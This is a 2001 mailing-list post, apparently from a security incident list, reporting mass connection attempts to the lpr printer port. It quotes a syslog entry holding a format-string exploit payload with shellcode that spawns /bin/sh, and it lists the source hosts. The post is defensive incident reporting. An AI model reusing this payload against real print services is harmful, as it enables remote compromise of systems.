Re: Printer exploit?

From: Piotr Klaban (maklerat_private)
Date: Wed Jun 27 2001 - 05:02:21 PDT

  • Next message: Andy Duncan: "RE: massive lpr exploit attempt"

    On Tue, Jun 26, 2001 at 02:32:05PM -0600, Brendan Murphy wrote:
    >    Has anyone heard of any exploits to LaserJet printers, or printers in
    > general that might cause this problem?  We've been through the gambit with
    > HP and nothing seems to match...
    
    We have got the problem with connections from several places to the 515 port.
    Our problem could be uncorrelated with yours. We'd block 515 port,
    but maybe someone else has also such connections, and someone here
    know someone abroad that can stop that hackers ...
    
    In the logs we have seen several hundrets messages that looks like this:
    
    Jun 27 13:36:37 azor bsd-gw[461]: [ID 315218 lpr.error] Invalid protocol request (66):
    BBB4\375\2775\375\2776\375\2777\375\277XXXXXXXXXXXXXXXXXX%.244u%300$n%.
    199u%301$n%.255u%302$n%.192u%303$n1\3331\3111\300F\315\3451
    \322f\3201\311\313C]\370C]\364KM\374M\364\3151\311E\364Cf]\354f\307E
    \356'M\360E\354E\370\306E\374\320M\364\315\320CC\315\320C\315\3031
    \311?\320\315\320A\315\353^u1\300FE\363MU\315\350\343/bin/sh
    
    If you run the command 'telnet localhost printer' (printer == 515)
    and write something - it would be logged with the similar message.
    
    I run the atmsnoop together with ethereal (to parse atmsnoop output files)
    and filter out the following connections so far:
    
     230 connections from k1.t4d116.voas.fi
     239 connections from pop-mu-1-1-dialup-7.freesurf.ch
    
    I do not have time to contact the ISPs (from freesurf.ch and voas.fi)
    since I do not belive that they do something with that people.
    
    Best regards,
    
    -- 
    Piotr Klaban
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Jun 27 2001 - 18:11:28 PDT